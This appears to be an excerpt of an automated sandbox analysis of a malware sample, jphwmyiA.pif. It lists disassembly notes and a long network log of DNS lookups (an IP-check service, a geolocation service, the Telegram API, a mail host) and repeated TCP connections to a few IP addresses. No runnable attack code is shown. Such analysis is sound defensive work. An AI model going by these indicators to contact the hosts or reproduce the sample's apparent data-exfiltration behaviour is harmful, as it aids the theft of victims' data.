                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 200FA3E8h15_2_200FA0F0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120CC8h15_2_201209D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h15_2_2012FDF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120338h15_2_20120040
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then jmp 20120800h15_2_20120508
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, 000003E8h15_2_2012FDEF
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FAD8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FAC9
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_2013FDEE
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_202931D0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]15_2_2029EF78
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]15_2_2029EF70
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_202931C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 4x nop then push 00000000h15_2_20BDE28E
                  Source: global trafficDNS query: name: amazonenviro.com
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: mail.techniqueqatar.com
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49713 -> 166.62.27.188:80
                  Source: global trafficTCP traffic: 192.168.2.5:49723 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49723 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49723 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49731 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49736 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53584 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53597 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53606 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53618 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53623 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53630 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53623 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53623 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53650 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53662 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53671 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53683 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53694 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53681 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53709 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53711 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53723 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53724 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53738 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53750 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53759 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53771 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:53782 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49726 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53582 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53591 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53604 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53612 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53624 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53636 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53637 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53644 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53643 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53657 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53667 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53677 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53689 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53696 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53701 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53705 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53716 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53718 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53730 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53731 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53734 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53744 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53756 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53765 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53779 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53788 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:53795 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
                  Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
